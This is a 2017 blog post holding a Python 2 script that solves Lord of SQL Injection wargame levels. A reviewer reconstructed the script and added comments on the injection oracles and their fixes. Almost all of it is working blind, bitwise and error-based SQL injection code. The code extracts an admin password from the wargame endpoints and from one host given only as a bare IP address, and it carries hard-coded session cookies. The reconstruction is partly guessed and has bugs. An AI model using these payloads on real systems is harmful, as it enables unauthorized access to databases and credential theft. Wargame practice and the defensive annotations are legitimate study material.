웹/SQL injection
LOS org~darkeyes
shnec
2017. 8. 3. 20:31
# Python 2 script (print statements). The listing reached this page with its
# line breaks and indentation collapsed; the layout below is a reconstruction.
# NOTE(review): where a trailing statement could sit at more than one nesting
# level, the placement chosen here is a best guess and is marked as such.
#
# All three functions in this part use a boolean oracle: one comparison is
# sent per request in the `pw` parameter and the answer is read from whether
# 'Hello admin' appears in the response. The payloads imply the server builds
# its SQL by string concatenation (the PHP is not shown here). The predicate
# is spelled differently per function (and / &&, = / like, substr / mid), so a
# keyword denylist does not remove the oracle; a parameterized query does.
# Up to 96 sequential requests per character position, each carrying a
# substr/ascii comparison, is the pattern to look for in access logs.
import requests
import time
# NOTE(review): `s` is never used in the visible listing; every call goes
# through requests.get directly.
s=requests.session()
# NOTE(review): session identifiers are hard-coded and were published with the
# listing; treat them as exposed and load them from the environment instead.
# org(), orge() and golem() also send them over plain http://.
cookie={'__cfduid':'d392d5cf39f2a1476ffb7cf441ad0da3b1501471981','PHPSESSID':'2h91mockfjn960lg20cl338712'}
password=''
#orc
def org():
    """Probe positions 1..49 of `pw`, one candidate byte (0x20..0x7f) per request.

    0x61646d696e is the hex encoding of 'admin'. A response containing
    'Hello admin' means the candidate matched at that position.
    """
    # NOTE(review): `password` is assigned below without a local initialiser or
    # a `global` statement, so the first match raises UnboundLocalError.
    for ind in range(1,50):
        for x in range(0x20,0x80):#0x80):
            res=requests.get('http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php',params={"pw":"1\'||id=0x61646d696e and (select ascii(substr(pw,{},1)))={}#".format(ind,x)},cookies=cookie).text
            if 'Hello admin' in res:
                print x
                print '[**]'+chr(x)
                password+=chr(x)
                print 'password: '+password
                break
            # NOTE(review): nesting is a guess; this check may have sat one
            # level out, where its break would end the position loop instead.
            if x==0x7f:
                print '[xx]'
                break
#orge
def orge():
    """Same loop as org() against the orge endpoint, positions 1..9.

    The predicate uses `&&` where org() uses `and`.
    """
    # NOTE(review): same unbound `password` problem as in org().
    for ind in range(1,10):
        for x in range(0x20,0x80):#0x80):
            res=requests.get('http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php',params={"pw":"1'||id=0x61646d696e&&(select ascii(substr(pw,{},1)))={}#".format(ind,x)},cookies=cookie).text
            if 'Hello admin' in res:
                print x
                print '[**]'+chr(x)
                password+=chr(x)
                print 'password: '+password
                break
            # NOTE(review): nesting is a guess, as in org().
            if x==0x7f:
                print '[xx]'
                break
#golem
#https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php?pw=123%27||id%20like%20%27admin%27%26%26ascii(mid(pw,1,1))>0%23
def golem():
    """Same loop against the golem endpoint, positions 1..9.

    Both comparisons are written with `like` and the substring is taken
    with mid().
    """
    # NOTE(review): same unbound `password` problem as in org().
    for ind in range(1,10):
        for x in range(0x20,0x80):#0x80):
            res=requests.get('http://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.php',params={"pw":"123'||id like 'admin'&&ascii(mid(pw,{},1)) like {}#".format(ind,x)},cookies=cookie).text
            if 'Hello admin' in res:
                print x
                print '[**]'+chr(x)
                password+=chr(x)
                print 'password: '+password
                break
            # NOTE(review): nesting is a guess, as in org().
            if x==0x7f:
                print '[xx]'
                break
#darknight
#https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?
# Python 2 code (print statements). The listing reached this page with its
# line breaks and indentation collapsed; the layout below is a reconstruction.
# NOTE(review): where a trailing statement (`print res`, `print p`, the
# `if x==0x7f` check) could sit at more than one nesting level, the placement
# chosen here is a best guess.
#
# The functions read one bit of information per request from the response
# body: a greeting string, a database error message, or a page marker. The
# payloads imply the server concatenates request parameters into SQL (the PHP
# is not shown here); a parameterized query removes every oracle used below,
# and not echoing database errors removes the one iron_golem() reads.
def darknight():
    """Probe positions 1..9 of `pw` through the `no` parameter, one candidate byte per request.

    The predicate contains no quote characters: 'admin' is written as the hex
    literal 0x61646d696e and the byte is compared with ord(mid(...)) like N.
    """
    password=''
    for ind in range(1,10):
        for x in range(0x20,0x80):#0x80):
            res=requests.get('https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php',params={"pw":"123","no":"123||id like 0x61646d696e&&ord(mid(pw,{},1)) like {}#".format(ind,x)},cookies=cookie).text
            if 'Hello admin' in res:
                print x
                print '[**]'+chr(x)
                password+=chr(x)
                print 'password: '+password
                break
            # NOTE(review): nesting is a guess; one level out, this break
            # would end the position loop instead.
            if x==0x7f:
                print '[xx]'
                break
    print res
def bugbear():
    """Recover positions 1..9 bit by bit: 8 requests per position instead of up to 96.

    Each request asks whether hex(mid(pw, ind, 1)) is below a hex threshold;
    a response without 'Hello admin' sets the current bit in `p`.
    """
    password=''
    for ind in range(1,10):
        p=0
        # Bits are tested from 2**7 down to 2**0.
        for x in range(7,-1,-1):
            param={"pw":"123","no":"1||no>1&&hex(mid(pw,{},1))<{}#".format(ind,hex(p+2**x)[2:])}
            res=requests.get('https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php',params=param,cookies=cookie).text
            if 'Hello admin' not in res:
                p+=2**x
        print '[**]'+chr(p)
        password+=chr(p)
        print 'password: '+password
    print res
def giant():
    """Send a single vertical-tab character (0x0b) as the parameter and print the response."""
    password=''  # unused
    param={'shit':chr(0xb)}
    res=requests.get('https://los.eagle-jump.org/giant_9e5c61fc7f0711c680a4bf2553ee60bb.php',params=param,cookies=cookie).text
    print res
# Candidate alphabet for assassin(); the upper-case half is commented out.
string='0123456789abcdefghijklmnopqrstuvwxyz'#ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def assassin():
    """Grow a known prefix one character at a time, sending prefix + candidate + '%'.

    The trailing '%' suggests the server matches `pw` with LIKE (not shown
    here). 'Hello ' marks any match; 'Hello admin' marks the wanted row and
    stops the candidate loop.
    """
    password=''
    for i in range(10):
        #for x in range(0x20,0x80):
        for c in string:
            param={'pw':password+c+'%'}
            #print param
            res=requests.get('https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php',params=param,cookies=cookie).text
            #print res
            # NOTE(review): the nesting of this block is a guess. With this
            # layout `x` keeps the last candidate that matched any row, and is
            # unbound if none matched on the first pass.
            if 'Hello ' in res:
                if 'Hello admin' in res:
                    x=c
                    break
                x=c
        password+=x
        print 'password :'+password
def zombie_assassin():
    """Send id='guest' and a `pw` that starts with a NUL byte, then print the response."""
    password=''  # unused
    param={'id':'guest','pw':"{}'||1#'".format(chr(0x0))}
    res=requests.get('https://los.eagle-jump.org/zombie_assassin_14dfa83153eb348c4aea012d453e9c8a.php',params=param,cookies=cookie).text
    print res
def succubus():
    """Send a single backslash as `id` and "||1=1#" as `pw`, then print the response."""
    password=''  # unused
    param={'id':'\\','pw':"||1=1#"}
    res=requests.get('https://los.eagle-jump.org/succubus_8ab2d195be2e0b10a3b5aa2873d0863f.php',params=param,cookies=cookie).text
    print res
def nightmare():
    """Send a short `pw` that ends with a NUL byte, then print the response."""
    password=''  # unused
    param={'pw':"')=0;{}".format(chr(0))}
    res=requests.get('https://los.eagle-jump.org/nightmare_ce407ee88ba848c2bec8e42aaeaa6ad4.php',params=param,cookies=cookie).text
    print res
def xavis():
    """Recover positions 1..50 bit by bit with 11 bits per position.

    Eleven bits allow values up to 2047, so each result is recorded as hex
    text rather than passed through chr().
    """
    password=''
    for ind in range(1,51):
        p=0
        # Bits are tested from 2**10 down to 2**0.
        for x in range(10,-1,-1):
            param={'pw':"12'||id='admin'&&ord(substr(pw,{},1))<{}#".format(ind,p+2**x)}
            res=requests.get('https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php',params=param,cookies=cookie).text
            #print res
            #raw_input('>')
            if 'Hello admin' not in res:
                p+=2**x
                # NOTE(review): placement of this print is a guess.
                print p
        print '[**]'+hex(p)
        password+=hex(p)[2:]+' '
        print 'password: '+password
    print res
def hexor():
    """Bitwise search against a different host, addressed by IP, with no cookies sent.

    The predicate is split across the `id` and `pw` parameters, and the
    response marker is 'Hello guest' rather than 'Hello admin'.
    """
    # This first value is overwritten inside the loop before it is ever sent.
    param={'id':"123' union select 2,",'pw':"#"}
    password=''
    for ind in range(1,10):
        p=0
        for x in range(7,-1,-1):
            param={'id':"123' or ascii(substr(",'pw':",{},1))<{}#".format(ind,p+2**x)}
            res=requests.get('http://13.124.1.51/web/prob15/?id=info',params=param).text
            if 'Hello guest' not in res:
                p+=2**x
                # NOTE(review): placement of the debug prints below is a guess.
                #print p
                print res
                #time.sleep(10000)
                print p
        print '[**]'+chr(p)
        password+=chr(p)
        print 'password: '+password
def dragon():
    """Send one `pw` value containing a newline before the appended condition, then print the response."""
    param={'pw':"1'\n||id='admin' order by id#"}
    res=requests.get('https://los.eagle-jump.org/dragon_7ead3fe768221c5d34bc42d518130972.php',params=param,cookies=cookie).text
    print res
def iron_golem():
    """Error-based variant: the bit is read from a database error string in the response.

    The script expects 'Subquery returns more than 1 row' to be echoed to the
    client, so it only works if the endpoint exposes database errors.
    """
    # NOTE(review): looks like an unfinished draft. The predicate tests
    # equality while the loop accumulates bits the way the `<` searches do,
    # and the loop sleeps 1000 seconds per request.
    password=''
    for ind in range(1,51):
        p=0#ascii(substr(pw,{},1))<{}
        for x in range(10,-1,-1):
            param={'pw':"123'||id='admin'&&(select if(ord(substr(pw,{},1))={}&&id='admin',True,(select 1 union select 2)))#".format(ind,p+2**x)}
            res=requests.get('https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php',params=param,cookies=cookie).text
            if 'Subquery returns more than 1 row' in res:
                p+=2**x
            # NOTE(review): placement of the next three statements is a guess.
            print res
            time.sleep(1000)
            print p
        print '[**]'+hex(p)
        password+=hex(p)[2:]+' '
        print 'password: '+password
def dark_eyes():
    """Bitwise search where the oracle is whether the normal page marker is missing.

    A response that lacks the 'query : ' marker is taken as the signal and
    sets the current bit.
    """
    password=''
    for ind in range(1,51):
        p=0
        for x in range(10,-1,-1):
            param={'pw':"123'||id='admin'&&(select ord(substr(pw,{},1))<{} union select 1)#".format(ind,p+2**x)}
            res=requests.get('https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php',params=param,cookies=cookie).text
            # NOTE(review): this literal reached the page split across a line
            # break, written here as \n. An HTML tag in front of 'query : '
            # was probably rendered away by the blog; confirm against a real
            # response.
            if '\nquery : ' not in res:
                p+=2**x
                # NOTE(review): placement of this print is a guess.
                print p
        print '[**]'+chr(p)
        password+=chr(p)
        print 'password: '+password
    print res
def umaru():
    """Send "select 1 union select 2" as the `flag` parameter and print the response."""
    password=''  # unused
    param={'flag':"select 1 union select 2"}
    res=requests.get('https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php',params=param,cookies=cookie).text
    print res
# Only umaru() is enabled. It runs at import time because there is no
# __main__ guard.
#hexor()
#dragon()
#xavis()
#iron_golem()
#dark_eyes()
umaru()
#"' or if((select id='admin' and substr(pw,1,1)='a',true,(select 1 union select 2)))